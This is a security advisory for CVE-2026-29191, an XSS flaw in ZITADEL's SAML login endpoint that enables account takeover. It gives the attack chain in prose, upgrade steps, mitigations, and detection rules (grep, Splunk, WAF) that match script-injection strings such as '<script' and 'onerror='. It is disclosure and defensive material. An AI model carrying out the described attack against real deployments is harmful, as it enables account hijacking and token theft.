Executive Summary
The ZITADEL security team has disclosed CVE-2026-29191, a critical cross-site scripting (XSS) vulnerability in the open-source identity management platform's login V2 interface. The flaw resides in the /saml-post endpoint and enables a 1-click account takeover — an attacker can craft a malicious SAML response that injects arbitrary JavaScript into the victim's browser session, hijacking authentication tokens and fully compromising the targeted account.
CVSS Score: 9.3 (Critical)
All ZITADEL deployments running versions 4.0.0 through 4.11.1 are affected. The issue has been resolved in version 4.12.0, released March 7, 2026.
Vulnerability Overview
Root Cause
ZITADEL's login V2 /saml-post endpoint processes SAML assertion responses during federated authentication flows. The endpoint failed to properly sanitize and encode attacker-controlled values within the SAML response before rendering them in the browser. This unsanitized output creates a DOM injection point that executes arbitrary JavaScript in the context of the authenticated ZITADEL session.
Because the XSS fires within the ZITADEL identity provider's origin, the injected script has direct access to session cookies, OIDC tokens, and in-flight authentication state — enabling full account takeover.
Attack Vector
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-29191 |
| CVSS Score | 9.3 (Critical) |
| CVSS Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N |
| CWE | CWE-79: Cross-Site Scripting |
| Attack Type | 1-Click Account Takeover via XSS |
| Authentication Required | None (attacker-controlled IdP sufficient) |
| User Interaction | Required (victim must click a crafted link) |
| Affected Component | Login V2 /saml-post endpoint |
| Disclosure Date | March 7, 2026 |
Technical Details
Attack Chain
1. Attacker controls a SAML Identity Provider (IdP) or intercepts a SAML flow
2. Crafts a malicious SAML response containing XSS payload in assertion attributes
3. Generates a link that initiates a SAML auth flow with ZITADEL as SP
4. Victim clicks the link — browser submits the crafted SAMLResponse via POST
5. ZITADEL /saml-post renders unsanitized attribute values into the page DOM
6. Injected JavaScript executes in the ZITADEL origin context
7. Script exfiltrates session tokens, cookies, or performs actions as the victim
8. Full account takeover achieved with a single user interactionWhy This Is Severe
The /saml-post endpoint is part of the Service Provider (SP)-initiated SAML flow — a standard federation pattern used across enterprise SSO integrations. Because ZITADEL acts as an identity provider itself, a successful exploit grants the attacker access not just to ZITADEL but to every downstream application that trusts ZITADEL tokens, including OIDC/OAuth2 clients configured in the organization.
The low attack complexity (no specific network position required) and absence of authentication prerequisites make this trivially exploitable by any threat actor who can serve a malicious SAML response.
Affected Versions
| ZITADEL Version | Status | Action Required |
|---|---|---|
| 4.0.0 – 4.11.1 | Vulnerable | Upgrade immediately to 4.12.0 |
| 4.12.0+ | Patched | No action required |
| < 4.0.0 | Not affected (Login V2 absent) | Review upgrade path |
Remediation
Immediate Action: Upgrade to 4.12.0
The only complete fix is upgrading ZITADEL to version 4.12.0 or later. ZITADEL 4.12.0 introduces proper output encoding of SAML assertion attributes before DOM rendering in the login V2 interface.
# Docker — pull latest patched image
docker pull ghcr.io/zitadel/zitadel:v4.12.0
# Kubernetes — update your Helm values or image tag
helm upgrade zitadel zitadel/zitadel \
--set image.tag=v4.12.0
# Binary deployment — download from GitHub releases
# https://github.com/zitadel/zitadel/releases/tag/v4.12.0Temporary Mitigations (If Immediate Upgrade Is Not Possible)
- Disable SAML SP functionality — If your deployment does not require SAML federation, disable the SAML endpoint to reduce attack surface.
- Restrict external IdP connections — Limit which SAML Identity Providers can initiate flows against your ZITADEL instance by allowlisting trusted IdP metadata URLs.
- WAF rule — block unsanitized SAML POST bodies — Deploy a WAF rule to inspect
SAMLResponsePOST parameters for script injection patterns (<script>,javascript:, event handlers). - Enable MFA/Passwordless for all accounts — While MFA does not prevent the XSS itself, it adds a layer of friction for downstream application access.
Detection
Identify Suspicious SAML POST Requests
Review web/application logs for /saml-post requests containing anomalous assertion content:
# Nginx / access log — grep for saml-post with unusual patterns
grep "POST /saml-post" /var/log/nginx/access.log | \
grep -E "(<script|javascript:|onerror=|onload=)"
# ZITADEL application logs — look for rendering errors near saml-post
journalctl -u zitadel --since "2026-03-01" | grep -i "saml-post"SIEM Query (Splunk)
index=web_logs uri="/saml-post" method=POST
| eval payload=urldecode(form_data)
| where match(payload, "(?i)(<script|javascript:|onerror=|onload=|<img[^>]+src=)")
| stats count by src_ip, uri, _time
| sort -_timeIndicators of Compromise
- Unexpected SAML POST requests to
/saml-postoriginating from unfamiliar IdP domains - User sessions appearing from IP addresses inconsistent with the user's geography (post-token theft)
- API calls or admin actions performed shortly after SAML authentication from new IP addresses
Related ZITADEL Vulnerabilities (March 2026 Batch)
Three additional ZITADEL vulnerabilities were disclosed simultaneously on March 7, 2026:
| CVE | Description | CVSS | Severity |
|---|---|---|---|
| CVE-2026-29191 | XSS in /saml-post — 1-click account takeover | 9.3 | Critical |
| CVE-2026-29067 | Password reset host header injection — account takeover | 8.1 | High |
| CVE-2026-29192 | Stored XSS via Default URI Redirect — account takeover | 7.7 | High |
| CVE-2026-29193 | Login V2 UI policy bypass — unauthorized self-registration | TBD | TBD |
Organizations running ZITADEL should treat the March 7, 2026 release as a critical security patch addressing multiple high-severity account takeover vectors in the login V2 interface.
About ZITADEL
ZITADEL is an open-source, cloud-native identity and access management (IAM) platform written in Go. It serves as an OIDC/OAuth2 identity provider, SAML service provider, and user management system. Organizations self-hosting ZITADEL as their authentication layer are most at risk, as cloud-hosted ZITADEL instances are managed by the vendor and may receive automatic patches.